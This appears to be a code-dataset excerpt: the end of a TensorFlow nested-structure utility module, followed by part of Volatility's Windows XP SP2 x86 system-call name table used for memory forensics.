    # depth-1 structure of bools shaped like structure's top level.
    assert_shallow_structure(to_traverse, structure)
    for t, branch in zip(_yield_value(to_traverse), _yield_value(structure)):
      if not isinstance(t, bool):
        raise TypeError(
            "traverse_fn didn't return a depth=1 structure of bools.  saw: %s "
            " for structure: %s" % (to_traverse, structure))
      if t:
        level_traverse.append(
            get_traverse_shallow_structure(traverse_fn, branch))
      else:
        # Prune this branch: mark it un-traversable in the shallow result.
        level_traverse.append(False)
  # Repack the per-branch answers into the same sequence type as structure.
  return _sequence_like(structure, level_traverse)
def yield_flat_paths(nest):
  """Yields the path tuple for every leaf of a nested structure.

  Paths are tuples of objects which can be str-converted (dict keys,
  namedtuple field names, or integer sequence indices). The yield order
  matches that of flattening the structure, which is handy for naming
  Tensors so the TF scope structure matches the tuple structure.

  For example, with `value = Foo(a=3, b=Bar(c=23, d=42))`:

  ```shell
  >>> list(nest.yield_flat_paths(value))
  [('a',), ('b', 'c'), ('b', 'd')]
  >>> list(nest.yield_flat_paths({'a': [3]}))
  [('a', 0)]
  >>> list(nest.yield_flat_paths({'a': 3}))
  [('a',)]
  ```

  Args:
    nest: the value to produce a flattened paths list for.

  Yields:
    Tuples of keys/indices forming the path to each leaf value.
  """
  if isinstance(nest, (dict, _collections.Mapping)):
    for key in _sorted(nest):
      for tail in yield_flat_paths(nest[key]):
        yield (key,) + tail
  elif _is_namedtuple(nest):
    for field in nest._fields:
      for tail in yield_flat_paths(getattr(nest, field)):
        yield (field,) + tail
  elif isinstance(nest, _six.string_types):
    # Strings are iterable, but for path purposes they count as leaves;
    # this branch must stay before the generic Sequence check.
    yield ()
  elif isinstance(nest, _collections.Sequence):
    for index, item in enumerate(nest):
      for tail in yield_flat_paths(item):
        yield (index,) + tail
  else:
    # Any other object is a leaf with an empty path.
    yield ()
def flatten_with_joined_string_paths(structure, separator="/"):
  """Returns `[(joined_path, leaf), ...]` pairs for a nested structure.

  The pair order matches `nest.flatten`, so this flattens a structure while
  recording where in the structure each data element was located. See
  `nest.yield_flat_paths` for the path semantics.

  Args:
    structure: the nested structure to flatten.
    separator: string inserted between hierarchy levels in each joined path;
      defaults to '/'.

  Returns:
    A list of (string path, data element) tuples.
  """
  def _join(path_elements):
    return separator.join(str(element) for element in path_elements)

  joined_paths = [_join(path) for path in yield_flat_paths(structure)]
  return list(zip(joined_paths, flatten(structure)))
# Register the abstract container types with the native extension so its
# nest operations can recognize Mapping/Sequence instances.
# NOTE(review): registration semantics live inside _pywrap_tensorflow —
# confirm against that module's RegisterType definition.
_pywrap_tensorflow.RegisterType("Mapping", _collections.Mapping)
_pywrap_tensorflow.RegisterType("Sequence", _collections.Sequence)
| apache-2.0 |
shantanu561993/volatility | volatility/plugins/overlays/windows/xp_sp2_x86_syscalls.py | 58 | 34509 | # Volatility
# Copyright (c) 2008-2013 Volatility Foundation
# Copyright (c) 2011 Michael Hale Ligh <michael.hale@gmail.com>
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
syscalls = [
[
'NtAcceptConnectPort', # 0x0
'NtAccessCheck', # 0x1
'NtAccessCheckAndAuditAlarm', # 0x2
'NtAccessCheckByType', # 0x3
'NtAccessCheckByTypeAndAuditAlarm', # 0x4
'NtAccessCheckByTypeResultList', # 0x5
'NtAccessCheckByTypeResultListAndAuditAlarm', # 0x6
'NtAccessCheckByTypeResultListAndAuditAlarmByHandle', # 0x7
'NtAddAtom', # 0x8
'NtAddBootEntry', # 0x9
'NtAdjustGroupsToken', # 0xa
'NtAdjustPrivilegesToken', # 0xb
'NtAlertResumeThread', # 0xc
'NtAlertThread', # 0xd
'NtAllocateLocallyUniqueId', # 0xe
'NtAllocateUserPhysicalPages', # 0xf
'NtAllocateUuids', # 0x10
'NtAllocateVirtualMemory', # 0x11
'NtAreMappedFilesTheSame', # 0x12
'NtAssignProcessToJobObject', # 0x13
'NtCallbackReturn', # 0x14
'NtCancelDeviceWakeupRequest', # 0x15
'NtCancelIoFile', # 0x16
'NtCancelTimer', # 0x17
'NtClearEvent', # 0x18
'NtClose', # 0x19
'NtCloseObjectAuditAlarm', # 0x1a
'NtCompactKeys', # 0x1b
'NtCompareTokens', # 0x1c
'NtCompleteConnectPort', # 0x1d
'NtCompressKey', # 0x1e
'NtConnectPort', # 0x1f
'NtContinue', # 0x20
'NtCreateDebugObject', # 0x21
'NtCreateDirectoryObject', # 0x22
'NtCreateEvent', # 0x23
'NtCreateEventPair', # 0x24
'NtCreateFile', # 0x25
'NtCreateIoCompletion', # 0x26
'NtCreateJobObject', # 0x27
'NtCreateJobSet', # 0x28
'NtCreateKey', # 0x29
'NtCreateMailslotFile', # 0x2a
'NtCreateMutant', # 0x2b
'NtCreateNamedPipeFile', # 0x2c
'NtCreatePagingFile', # 0x2d
'NtCreatePort', # 0x2e
'NtCreateProcess', # 0x2f
'NtCreateProcessEx', # 0x30
'NtCreateProfile', # 0x31
'NtCreateSection', # 0x32
'NtCreateSemaphore', # 0x33
'NtCreateSymbolicLinkObject', # 0x34
'NtCreateThread', # 0x35
'NtCreateTimer', # 0x36
'NtCreateToken', # 0x37
'NtCreateWaitablePort', # 0x38
'NtDebugActiveProcess', # 0x39
'NtDebugContinue', # 0x3a
'NtDelayExecution', # 0x3b
'NtDeleteAtom', # 0x3c
'NtDeleteBootEntry', # 0x3d
'NtDeleteFile', # 0x3e
'NtDeleteKey', # 0x3f
'NtDeleteObjectAuditAlarm', # 0x40
'NtDeleteValueKey', # 0x41
'NtDeviceIoControlFile', # 0x42
'NtDisplayString', # 0x43
'NtDuplicateObject', # 0x44
'NtDuplicateToken', # 0x45
'NtEnumerateBootEntries', # 0x46
'NtEnumerateKey', # 0x47
'NtEnumerateSystemEnvironmentValuesEx', # 0x48
'NtEnumerateValueKey', # 0x49
'NtExtendSection', # 0x4a
'NtFilterToken', # 0x4b
'NtFindAtom', # 0x4c
'NtFlushBuffersFile', # 0x4d
'NtFlushInstructionCache', # 0x4e
'NtFlushKey', # 0x4f
'NtFlushVirtualMemory', # 0x50
'NtFlushWriteBuffer', # 0x51
'NtFreeUserPhysicalPages', # 0x52
'NtFreeVirtualMemory', # 0x53
'NtFsControlFile', # 0x54
'NtGetContextThread', # 0x55
'NtGetDevicePowerState', # 0x56
'NtGetPlugPlayEvent', # 0x57
'NtGetWriteWatch', # 0x58
'NtImpersonateAnonymousToken', # 0x59
'NtImpersonateClientOfPort', # 0x5a
'NtImpersonateThread', # 0x5b
'NtInitializeRegistry', # 0x5c
'NtInitiatePowerAction', # 0x5d
'NtIsProcessInJob', # 0x5e
'NtIsSystemResumeAutomatic', # 0x5f
'NtListenPort', # 0x60
'NtLoadDriver', # 0x61
'NtLoadKey', # 0x62
'NtLoadKey2', # 0x63
'NtLockFile', # 0x64
'NtLockProductActivationKeys', # 0x65
'NtLockRegistryKey', # 0x66
'NtLockVirtualMemory', # 0x67
'NtMakePermanentObject', # 0x68
'NtMakeTemporaryObject', # 0x69
'NtMapUserPhysicalPages', # 0x6a
'NtMapUserPhysicalPagesScatter', # 0x6b
'NtMapViewOfSection', # 0x6c
'NtModifyBootEntry', # 0x6d
'NtNotifyChangeDirectoryFile', # 0x6e
'NtNotifyChangeKey', # 0x6f
'NtNotifyChangeMultipleKeys', # 0x70
'NtOpenDirectoryObject', # 0x71
'NtOpenEvent', # 0x72
'NtOpenEventPair', # 0x73
'NtOpenFile', # 0x74
'NtOpenIoCompletion', # 0x75
'NtOpenJobObject', # 0x76
'NtOpenKey', # 0x77
'NtOpenMutant', # 0x78
'NtOpenObjectAuditAlarm', # 0x79
'NtOpenProcess', # 0x7a
'NtOpenProcessToken', # 0x7b
'NtOpenProcessTokenEx', # 0x7c
'NtOpenSection', # 0x7d
'NtOpenSemaphore', # 0x7e
'NtOpenSymbolicLinkObject', # 0x7f
'NtOpenThread', # 0x80
'NtOpenThreadToken', # 0x81
'NtOpenThreadTokenEx', # 0x82
'NtOpenTimer', # 0x83
'NtPlugPlayControl', # 0x84
'NtPowerInformation', # 0x85
'NtPrivilegeCheck', # 0x86
'NtPrivilegeObjectAuditAlarm', # 0x87
'NtPrivilegedServiceAuditAlarm', # 0x88
'NtProtectVirtualMemory', # 0x89
'NtPulseEvent', # 0x8a
'NtQueryAttributesFile', # 0x8b
'NtQueryBootEntryOrder', # 0x8c
'NtQueryBootOptions', # 0x8d
'NtQueryDebugFilterState', # 0x8e
'NtQueryDefaultLocale', # 0x8f
'NtQueryDefaultUILanguage', # 0x90
'NtQueryDirectoryFile', # 0x91
'NtQueryDirectoryObject', # 0x92
'NtQueryEaFile', # 0x93
'NtQueryEvent', # 0x94
'NtQueryFullAttributesFile', # 0x95
'NtQueryInformationAtom', # 0x96
'NtQueryInformationFile', # 0x97
'NtQueryInformationJobObject', # 0x98
'NtQueryInformationPort', # 0x99
'NtQueryInformationProcess', # 0x9a
'NtQueryInformationThread', # 0x9b
'NtQueryInformationToken', # 0x9c
'NtQueryInstallUILanguage', # 0x9d
'NtQueryIntervalProfile', # 0x9e
'NtQueryIoCompletion', # 0x9f
'NtQueryKey', # 0xa0
'NtQueryMultipleValueKey', # 0xa1
'NtQueryMutant', # 0xa2
'NtQueryObject', # 0xa3
'NtQueryOpenSubKeys', # 0xa4
'NtQueryPerformanceCounter', # 0xa5
'NtQueryQuotaInformationFile', # 0xa6
'NtQuerySection', # 0xa7
'NtQuerySecurityObject', # 0xa8
'NtQuerySemaphore', # 0xa9
'NtQuerySymbolicLinkObject', # 0xaa
'NtQuerySystemEnvironmentValue', # 0xab
'NtQuerySystemEnvironmentValueEx', # 0xac
'NtQuerySystemInformation', # 0xad
'NtQuerySystemTime', # 0xae
'NtQueryTimer', # 0xaf
'NtQueryTimerResolution', # 0xb0
'NtQueryValueKey', # 0xb1
'NtQueryVirtualMemory', # 0xb2
'NtQueryVolumeInformationFile', # 0xb3
'NtQueueApcThread', # 0xb4
'NtRaiseException', # 0xb5
'NtRaiseHardError', # 0xb6
'NtReadFile', # 0xb7
'NtReadFileScatter', # 0xb8
'NtReadRequestData', # 0xb9
'NtReadVirtualMemory', # 0xba
'NtRegisterThreadTerminatePort', # 0xbb
'NtReleaseMutant', # 0xbc
'NtReleaseSemaphore', # 0xbd
'NtRemoveIoCompletion', # 0xbe
'NtRemoveProcessDebug', # 0xbf
'NtRenameKey', # 0xc0
'NtReplaceKey', # 0xc1
'NtReplyPort', # 0xc2
'NtReplyWaitReceivePort', # 0xc3
'NtReplyWaitReceivePortEx', # 0xc4
'NtReplyWaitReplyPort', # 0xc5
'NtRequestDeviceWakeup', # 0xc6
'NtRequestPort', # 0xc7
'NtRequestWaitReplyPort', # 0xc8
'NtRequestWakeupLatency', # 0xc9
'NtResetEvent', # 0xca
'NtResetWriteWatch', # 0xcb
'NtRestoreKey', # 0xcc
'NtResumeProcess', # 0xcd
'NtResumeThread', # 0xce
'NtSaveKey', # 0xcf
'NtSaveKeyEx', # 0xd0
'NtSaveMergedKeys', # 0xd1
'NtSecureConnectPort', # 0xd2
'NtSetBootEntryOrder', # 0xd3
'NtSetBootOptions', # 0xd4
'NtSetContextThread', # 0xd5
'NtSetDebugFilterState', # 0xd6
'NtSetDefaultHardErrorPort', # 0xd7
'NtSetDefaultLocale', # 0xd8
'NtSetDefaultUILanguage', # 0xd9
'NtSetEaFile', # 0xda
'NtSetEvent', # 0xdb
'NtSetEventBoostPriority', # 0xdc
'NtSetHighEventPair', # 0xdd
'NtSetHighWaitLowEventPair', # 0xde
'NtSetInformationDebugObject', # 0xdf
'NtSetInformationFile', # 0xe0
'NtSetInformationJobObject', # 0xe1
'NtSetInformationKey', # 0xe2
'NtSetInformationObject', # 0xe3
'NtSetInformationProcess', # 0xe4
'NtSetInformationThread', # 0xe5
'NtSetInformationToken', # 0xe6
'NtSetIntervalProfile', # 0xe7
'NtSetIoCompletion', # 0xe8
'NtSetLdtEntries', # 0xe9
'NtSetLowEventPair', # 0xea
'NtSetLowWaitHighEventPair', # 0xeb
'NtSetQuotaInformationFile', # 0xec
'NtSetSecurityObject', # 0xed
'NtSetSystemEnvironmentValue', # 0xee
'NtSetSystemEnvironmentValueEx', # 0xef
'NtSetSystemInformation', # 0xf0
'NtSetSystemPowerState', # 0xf1
'NtSetSystemTime', # 0xf2
'NtSetThreadExecutionState', # 0xf3
'NtSetTimer', # 0xf4
'NtSetTimerResolution', # 0xf5
'NtSetUuidSeed', # 0xf6
'NtSetValueKey', # 0xf7
'NtSetVolumeInformationFile', # 0xf8
'NtShutdownSystem', # 0xf9
'NtSignalAndWaitForSingleObject', # 0xfa
'NtStartProfile', # 0xfb
'NtStopProfile', # 0xfc
'NtSuspendProcess', # 0xfd
'NtSuspendThread', # 0xfe
'NtSystemDebugControl', # 0xff
'NtTerminateJobObject', # 0x100
'NtTerminateProcess', # 0x101
'NtTerminateThread', # 0x102
'NtTestAlert', # 0x103
'NtTraceEvent', # 0x104
'NtTranslateFilePath', # 0x105
'NtUnloadDriver', # 0x106
'NtUnloadKey', # 0x107
'NtUnloadKeyEx', # 0x108
'NtUnlockFile', # 0x109
'NtUnlockVirtualMemory', # 0x10a
'NtUnmapViewOfSection', # 0x10b
'NtVdmControl', # 0x10c
'NtWaitForDebugEvent', # 0x10d
'NtWaitForMultipleObjects', # 0x10e
'NtWaitForSingleObject', # 0x10f
'NtWaitHighEventPair', # 0x110
'NtWaitLowEventPair', # 0x111
'NtWriteFile', # 0x112
'NtWriteFileGather', # 0x113
'NtWriteRequestData', # 0x114
'NtWriteVirtualMemory', # 0x115
'NtYieldExecution', # 0x116
'NtCreateKeyedEvent', # 0x117
'NtOpenKeyedEvent', # 0x118
'NtReleaseKeyedEvent', # 0x119
'NtWaitForKeyedEvent', # 0x11a
'NtQueryPortInformationProcess', # 0x11b
],
[
'NtGdiAbortDoc', # 0x0
'NtGdiAbortPath', # 0x1
'NtGdiAddFontResourceW', # 0x2
'NtGdiAddRemoteFontToDC', # 0x3
'NtGdiAddFontMemResourceEx', # 0x4
'NtGdiRemoveMergeFont', # 0x5
'NtGdiAddRemoteMMInstanceToDC', # 0x6
'NtGdiAlphaBlend', # 0x7
'NtGdiAngleArc', # 0x8
'NtGdiAnyLinkedFonts', # 0x9
'NtGdiFontIsLinked', # 0xa
'NtGdiArcInternal', # 0xb
'NtGdiBeginPath', # 0xc
'NtGdiBitBlt', # 0xd
'NtGdiCancelDC', # 0xe
'NtGdiCheckBitmapBits', # 0xf
'NtGdiCloseFigure', # 0x10
'NtGdiClearBitmapAttributes', # 0x11
'NtGdiClearBrushAttributes', # 0x12
'NtGdiColorCorrectPalette', # 0x13
'NtGdiCombineRgn', # 0x14
'NtGdiCombineTransform', # 0x15
'NtGdiComputeXformCoefficients', # 0x16
'NtGdiConsoleTextOut', # 0x17
'NtGdiConvertMetafileRect', # 0x18
'NtGdiCreateBitmap', # 0x19
'NtGdiCreateClientObj', # 0x1a
'NtGdiCreateColorSpace', # 0x1b
'NtGdiCreateColorTransform', # 0x1c
'NtGdiCreateCompatibleBitmap', # 0x1d
'NtGdiCreateCompatibleDC', # 0x1e
'NtGdiCreateDIBBrush', # 0x1f
'NtGdiCreateDIBitmapInternal', # 0x20
'NtGdiCreateDIBSection', # 0x21
'NtGdiCreateEllipticRgn', # 0x22
'NtGdiCreateHalftonePalette', # 0x23
'NtGdiCreateHatchBrushInternal', # 0x24
'NtGdiCreateMetafileDC', # 0x25
'NtGdiCreatePaletteInternal', # 0x26
'NtGdiCreatePatternBrushInternal', # 0x27
'NtGdiCreatePen', # 0x28
'NtGdiCreateRectRgn', # 0x29
'NtGdiCreateRoundRectRgn', # 0x2a
'NtGdiCreateServerMetaFile', # 0x2b
'NtGdiCreateSolidBrush', # 0x2c
'NtGdiD3dContextCreate', # 0x2d
'NtGdiD3dContextDestroy', # 0x2e
'NtGdiD3dContextDestroyAll', # 0x2f
'NtGdiD3dValidateTextureStageState', # 0x30
'NtGdiD3dDrawPrimitives2', # 0x31
'NtGdiDdGetDriverState', # 0x32
'NtGdiDdAddAttachedSurface', # 0x33
'NtGdiDdAlphaBlt', # 0x34
'NtGdiDdAttachSurface', # 0x35
'NtGdiDdBeginMoCompFrame', # 0x36
'NtGdiDdBlt', # 0x37
'NtGdiDdCanCreateSurface', # 0x38
'NtGdiDdCanCreateD3DBuffer', # 0x39
'NtGdiDdColorControl', # 0x3a
'NtGdiDdCreateDirectDrawObject', # 0x3b
'NtGdiDdCreateSurface', # 0x3c
'NtGdiDdCreateD3DBuffer', # 0x3d
'NtGdiDdCreateMoComp', # 0x3e
'NtGdiDdCreateSurfaceObject', # 0x3f
'NtGdiDdDeleteDirectDrawObject', # 0x40
'NtGdiDdDeleteSurfaceObject', # 0x41
'NtGdiDdDestroyMoComp', # 0x42
'NtGdiDdDestroySurface', # 0x43
'NtGdiDdDestroyD3DBuffer', # 0x44
'NtGdiDdEndMoCompFrame', # 0x45
'NtGdiDdFlip', # 0x46
'NtGdiDdFlipToGDISurface', # 0x47
'NtGdiDdGetAvailDriverMemory', # 0x48
'NtGdiDdGetBltStatus', # 0x49
'NtGdiDdGetDC', # 0x4a
'NtGdiDdGetDriverInfo', # 0x4b
'NtGdiDdGetDxHandle', # 0x4c
'NtGdiDdGetFlipStatus', # 0x4d
'NtGdiDdGetInternalMoCompInfo', # 0x4e
'NtGdiDdGetMoCompBuffInfo', # 0x4f
'NtGdiDdGetMoCompGuids', # 0x50
'NtGdiDdGetMoCompFormats', # 0x51
'NtGdiDdGetScanLine', # 0x52
'NtGdiDdLock', # 0x53
'NtGdiDdLockD3D', # 0x54
'NtGdiDdQueryDirectDrawObject', # 0x55
'NtGdiDdQueryMoCompStatus', # 0x56
'NtGdiDdReenableDirectDrawObject', # 0x57
'NtGdiDdReleaseDC', # 0x58
'NtGdiDdRenderMoComp', # 0x59
'NtGdiDdResetVisrgn', # 0x5a
'NtGdiDdSetColorKey', # 0x5b
'NtGdiDdSetExclusiveMode', # 0x5c
'NtGdiDdSetGammaRamp', # 0x5d
'NtGdiDdCreateSurfaceEx', # 0x5e
'NtGdiDdSetOverlayPosition', # 0x5f
'NtGdiDdUnattachSurface', # 0x60
'NtGdiDdUnlock', # 0x61
'NtGdiDdUnlockD3D', # 0x62
'NtGdiDdUpdateOverlay', # 0x63
'NtGdiDdWaitForVerticalBlank', # 0x64
'NtGdiDvpCanCreateVideoPort', # 0x65
'NtGdiDvpColorControl', # 0x66
'NtGdiDvpCreateVideoPort', # 0x67
'NtGdiDvpDestroyVideoPort', # 0x68
'NtGdiDvpFlipVideoPort', # 0x69
'NtGdiDvpGetVideoPortBandwidth', # 0x6a
'NtGdiDvpGetVideoPortField', # 0x6b
'NtGdiDvpGetVideoPortFlipStatus', # 0x6c
'NtGdiDvpGetVideoPortInputFormats', # 0x6d
'NtGdiDvpGetVideoPortLine', # 0x6e
'NtGdiDvpGetVideoPortOutputFormats', # 0x6f
'NtGdiDvpGetVideoPortConnectInfo', # 0x70
'NtGdiDvpGetVideoSignalStatus', # 0x71
'NtGdiDvpUpdateVideoPort', # 0x72
'NtGdiDvpWaitForVideoPortSync', # 0x73
'NtGdiDvpAcquireNotification', # 0x74
'NtGdiDvpReleaseNotification', # 0x75
'NtGdiDxgGenericThunk', # 0x76
'NtGdiDeleteClientObj', # 0x77
'NtGdiDeleteColorSpace', # 0x78
'NtGdiDeleteColorTransform', # 0x79
'NtGdiDeleteObjectApp', # 0x7a
'NtGdiDescribePixelFormat', # 0x7b
'NtGdiGetPerBandInfo', # 0x7c
'NtGdiDoBanding', # 0x7d
'NtGdiDoPalette', # 0x7e
'NtGdiDrawEscape', # 0x7f
'NtGdiEllipse', # 0x80
'NtGdiEnableEudc', # 0x81
'NtGdiEndDoc', # 0x82
'NtGdiEndPage', # 0x83
'NtGdiEndPath', # 0x84
'NtGdiEnumFontChunk', # 0x85
'NtGdiEnumFontClose', # 0x86
'NtGdiEnumFontOpen', # 0x87
'NtGdiEnumObjects', # 0x88
'NtGdiEqualRgn', # 0x89
'NtGdiEudcLoadUnloadLink', # 0x8a
'NtGdiExcludeClipRect', # 0x8b
'NtGdiExtCreatePen', # 0x8c
'NtGdiExtCreateRegion', # 0x8d
'NtGdiExtEscape', # 0x8e
'NtGdiExtFloodFill', # 0x8f
'NtGdiExtGetObjectW', # 0x90
'NtGdiExtSelectClipRgn', # 0x91
'NtGdiExtTextOutW', # 0x92
'NtGdiFillPath', # 0x93
'NtGdiFillRgn', # 0x94
'NtGdiFlattenPath', # 0x95
'NtGdiFlushUserBatch', # 0x96
'NtGdiFlush', # 0x97
'NtGdiForceUFIMapping', # 0x98
'NtGdiFrameRgn', # 0x99
'NtGdiFullscreenControl', # 0x9a
'NtGdiGetAndSetDCDword', # 0x9b
'NtGdiGetAppClipBox', # 0x9c
'NtGdiGetBitmapBits', # 0x9d
'NtGdiGetBitmapDimension', # 0x9e
'NtGdiGetBoundsRect', # 0x9f
'NtGdiGetCharABCWidthsW', # 0xa0
'NtGdiGetCharacterPlacementW', # 0xa1
'NtGdiGetCharSet', # 0xa2
'NtGdiGetCharWidthW', # 0xa3
'NtGdiGetCharWidthInfo', # 0xa4
'NtGdiGetColorAdjustment', # 0xa5
'NtGdiGetColorSpaceforBitmap', # 0xa6
'NtGdiGetDCDword', # 0xa7
'NtGdiGetDCforBitmap', # 0xa8
'NtGdiGetDCObject', # 0xa9
'NtGdiGetDCPoint', # 0xaa
'NtGdiGetDeviceCaps', # 0xab
'NtGdiGetDeviceGammaRamp', # 0xac
'NtGdiGetDeviceCapsAll', # 0xad
'NtGdiGetDIBitsInternal', # 0xae
'NtGdiGetETM', # 0xaf
'NtGdiGetEudcTimeStampEx', # 0xb0
'NtGdiGetFontData', # 0xb1
'NtGdiGetFontResourceInfoInternalW', # 0xb2
'NtGdiGetGlyphIndicesW', # 0xb3
'NtGdiGetGlyphIndicesWInternal', # 0xb4
'NtGdiGetGlyphOutline', # 0xb5
'NtGdiGetKerningPairs', # 0xb6
'NtGdiGetLinkedUFIs', # 0xb7
'NtGdiGetMiterLimit', # 0xb8
'NtGdiGetMonitorID', # 0xb9
'NtGdiGetNearestColor', # 0xba
'NtGdiGetNearestPaletteIndex', # 0xbb
'NtGdiGetObjectBitmapHandle', # 0xbc
'NtGdiGetOutlineTextMetricsInternalW', # 0xbd
'NtGdiGetPath', # 0xbe
'NtGdiGetPixel', # 0xbf
'NtGdiGetRandomRgn', # 0xc0
'NtGdiGetRasterizerCaps', # 0xc1
'NtGdiGetRealizationInfo', # 0xc2
'NtGdiGetRegionData', # 0xc3
'NtGdiGetRgnBox', # 0xc4
'NtGdiGetServerMetaFileBits', # 0xc5
'NtGdiGetSpoolMessage', # 0xc6
'NtGdiGetStats', # 0xc7
'NtGdiGetStockObject', # 0xc8
'NtGdiGetStringBitmapW', # 0xc9
'NtGdiGetSystemPaletteUse', # 0xca
'NtGdiGetTextCharsetInfo', # 0xcb
'NtGdiGetTextExtent', # 0xcc
'NtGdiGetTextExtentExW', # 0xcd
'NtGdiGetTextFaceW', # 0xce
'NtGdiGetTextMetricsW', # 0xcf
'NtGdiGetTransform', # 0xd0
'NtGdiGetUFI', # 0xd1
'NtGdiGetEmbUFI', # 0xd2
'NtGdiGetUFIPathname', # 0xd3
'NtGdiGetEmbedFonts', # 0xd4
'NtGdiChangeGhostFont', # 0xd5
'NtGdiAddEmbFontToDC', # 0xd6
'NtGdiGetFontUnicodeRanges', # 0xd7
'NtGdiGetWidthTable', # 0xd8
'NtGdiGradientFill', # 0xd9
'NtGdiHfontCreate', # 0xda
'NtGdiIcmBrushInfo', # 0xdb
'NtGdiInit', # 0xdc
'NtGdiInitSpool', # 0xdd
'NtGdiIntersectClipRect', # 0xde
'NtGdiInvertRgn', # 0xdf
'NtGdiLineTo', # 0xe0
'NtGdiMakeFontDir', # 0xe1
'NtGdiMakeInfoDC', # 0xe2
'NtGdiMaskBlt', # 0xe3
'NtGdiModifyWorldTransform', # 0xe4
'NtGdiMonoBitmap', # 0xe5
'NtGdiMoveTo', # 0xe6
'NtGdiOffsetClipRgn', # 0xe7
'NtGdiOffsetRgn', # 0xe8
'NtGdiOpenDCW', # 0xe9
'NtGdiPatBlt', # 0xea
'NtGdiPolyPatBlt', # 0xeb
'NtGdiPathToRegion', # 0xec
'NtGdiPlgBlt', # 0xed
'NtGdiPolyDraw', # 0xee
'NtGdiPolyPolyDraw', # 0xef
'NtGdiPolyTextOutW', # 0xf0
'NtGdiPtInRegion', # 0xf1
'NtGdiPtVisible', # 0xf2
'NtGdiQueryFonts', # 0xf3
'NtGdiQueryFontAssocInfo', # 0xf4
'NtGdiRectangle', # 0xf5
'NtGdiRectInRegion', # 0xf6
'NtGdiRectVisible', # 0xf7
'NtGdiRemoveFontResourceW', # 0xf8
'NtGdiRemoveFontMemResourceEx', # 0xf9
'NtGdiResetDC', # 0xfa
'NtGdiResizePalette', # 0xfb
'NtGdiRestoreDC', # 0xfc
'NtGdiRoundRect', # 0xfd
'NtGdiSaveDC', # 0xfe
'NtGdiScaleViewportExtEx', # 0xff
'NtGdiScaleWindowExtEx', # 0x100
'NtGdiSelectBitmap', # 0x101
'NtGdiSelectBrush', # 0x102
'NtGdiSelectClipPath', # 0x103
'NtGdiSelectFont', # 0x104
'NtGdiSelectPen', # 0x105
'NtGdiSetBitmapAttributes', # 0x106
'NtGdiSetBitmapBits', # 0x107
'NtGdiSetBitmapDimension', # 0x108
'NtGdiSetBoundsRect', # 0x109
'NtGdiSetBrushAttributes', # 0x10a
'NtGdiSetBrushOrg', # 0x10b
'NtGdiSetColorAdjustment', # 0x10c
'NtGdiSetColorSpace', # 0x10d
'NtGdiSetDeviceGammaRamp', # 0x10e
'NtGdiSetDIBitsToDeviceInternal', # 0x10f
'NtGdiSetFontEnumeration', # 0x110
'NtGdiSetFontXform', # 0x111
'NtGdiSetIcmMode', # 0x112
'NtGdiSetLinkedUFIs', # 0x113
'NtGdiSetMagicColors', # 0x114
'NtGdiSetMetaRgn', # 0x115
'NtGdiSetMiterLimit', # 0x116
'NtGdiGetDeviceWidth', # 0x117
'NtGdiMirrorWindowOrg', # 0x118
'NtGdiSetLayout', # 0x119
'NtGdiSetPixel', # 0x11a
'NtGdiSetPixelFormat', # 0x11b
'NtGdiSetRectRgn', # 0x11c
'NtGdiSetSystemPaletteUse', # 0x11d
'NtGdiSetTextJustification', # 0x11e
'NtGdiSetupPublicCFONT', # 0x11f
'NtGdiSetVirtualResolution', # 0x120
'NtGdiSetSizeDevice', # 0x121
'NtGdiStartDoc', # 0x122
'NtGdiStartPage', # 0x123
'NtGdiStretchBlt', # 0x124
'NtGdiStretchDIBitsInternal', # 0x125
'NtGdiStrokeAndFillPath', # 0x126
'NtGdiStrokePath', # 0x127
'NtGdiSwapBuffers', # 0x128
'NtGdiTransformPoints', # 0x129
'NtGdiTransparentBlt', # 0x12a
'NtGdiUnloadPrinterDriver', # 0x12b
'NtGdiUnmapMemFont', # 0x12c
'NtGdiUnrealizeObject', # 0x12d
'NtGdiUpdateColors', # 0x12e
'NtGdiWidenPath', # 0x12f
'NtUserActivateKeyboardLayout', # 0x130
'NtUserAlterWindowStyle', # 0x131
'NtUserAssociateInputContext', # 0x132
'NtUserAttachThreadInput', # 0x133
'NtUserBeginPaint', # 0x134
'NtUserBitBltSysBmp', # 0x135
'NtUserBlockInput', # 0x136
'NtUserBuildHimcList', # 0x137
'NtUserBuildHwndList', # 0x138
'NtUserBuildNameList', # 0x139
'NtUserBuildPropList', # 0x13a
'NtUserCallHwnd', # 0x13b
'NtUserCallHwndLock', # 0x13c
'NtUserCallHwndOpt', # 0x13d
'NtUserCallHwndParam', # 0x13e
'NtUserCallHwndParamLock', # 0x13f
'NtUserCallMsgFilter', # 0x140
'NtUserCallNextHookEx', # 0x141
'NtUserCallNoParam', # 0x142
'NtUserCallOneParam', # 0x143
'NtUserCallTwoParam', # 0x144
'NtUserChangeClipboardChain', # 0x145
'NtUserChangeDisplaySettings', # 0x146
'NtUserCheckImeHotKey', # 0x147
'NtUserCheckMenuItem', # 0x148
'NtUserChildWindowFromPointEx', # 0x149
'NtUserClipCursor', # 0x14a
'NtUserCloseClipboard', # 0x14b
'NtUserCloseDesktop', # 0x14c
'NtUserCloseWindowStation', # 0x14d
'NtUserConsoleControl', # 0x14e
'NtUserConvertMemHandle', # 0x14f
'NtUserCopyAcceleratorTable', # 0x150
'NtUserCountClipboardFormats', # 0x151
'NtUserCreateAcceleratorTable', # 0x152
'NtUserCreateCaret', # 0x153
'NtUserCreateDesktop', # 0x154
'NtUserCreateInputContext', # 0x155
'NtUserCreateLocalMemHandle', # 0x156
'NtUserCreateWindowEx', # 0x157
'NtUserCreateWindowStation', # 0x158
'NtUserDdeGetQualityOfService', # 0x159
'NtUserDdeInitialize', # 0x15a
'NtUserDdeSetQualityOfService', # 0x15b
'NtUserDeferWindowPos', # 0x15c
'NtUserDefSetText', # 0x15d
'NtUserDeleteMenu', # 0x15e
'NtUserDestroyAcceleratorTable', # 0x15f
'NtUserDestroyCursor', # 0x160
'NtUserDestroyInputContext', # 0x161
'NtUserDestroyMenu', # 0x162
'NtUserDestroyWindow', # 0x163
'NtUserDisableThreadIme', # 0x164
'NtUserDispatchMessage', # 0x165
'NtUserDragDetect', # 0x166
'NtUserDragObject', # 0x167
'NtUserDrawAnimatedRects', # 0x168
